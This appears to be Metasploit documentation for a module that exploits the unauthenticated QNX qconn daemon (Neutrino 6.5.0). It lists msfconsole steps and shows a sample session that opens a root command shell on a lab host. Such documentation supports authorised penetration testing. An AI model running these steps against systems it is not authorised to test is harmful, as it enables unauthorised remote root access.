## Description

  This module uses the qconn daemon on [QNX](http://www.qnx.com/)
  systems to gain a shell.

  The QNX qconn daemon does not require authentication and allows
  remote users to execute arbitrary operating system commands.


## Vulnerable Application

  The QNX qconn daemon is a service provider that provides support,
  such as profiling system information, to remote IDE components.

  This module has been tested successfully on:

  * QNX Neutrino 6.5.0 (x86)
  * QNX Neutrino 6.5.0 SP1 (x86)

  QNX Neutrino 6.5.0 Service Pack 1 is available here:

  * http://www.qnx.com/download/feature.html?programid=23665


## Verification Steps

  1. Start `msfconsole`
  2. `use exploit/unix/misc/qnx_qconn_exec`
  3. `set rhost <IP>`
  4. `set rport <PORT>`
  5. `run`
  6. You should get a session


## Scenarios


  ```
  msf5 > use exploit/unix/misc/qnx_qconn_exec 
  msf5 exploit(unix/misc/qnx_qconn_exec) > set rhost 172.16.191.215
  rhost => 172.16.191.215
  msf5 exploit(unix/misc/qnx_qconn_exec) > set rport 8000
  rport => 8000
  msf5 exploit(unix/misc/qnx_qconn_exec) > run

  [*] 172.16.191.215:8000 - Sending payload...
  [+] 172.16.191.215:8000 - Payload sent successfully
  [*] Found shell.
  [*] Command shell session 1 opened (172.16.191.188:33641 -> 172.16.191.215:8000) at 2018-03-21 00:19:37 -0400


  0oxdgl2UgHIvCYBO
  # id
  id
  uid=0(root) gid=0(root)
  # uname -a
  uname -a
  QNX localhost 6.5.0 2012/06/20-13:50:50EDT x86pc x86
  ```

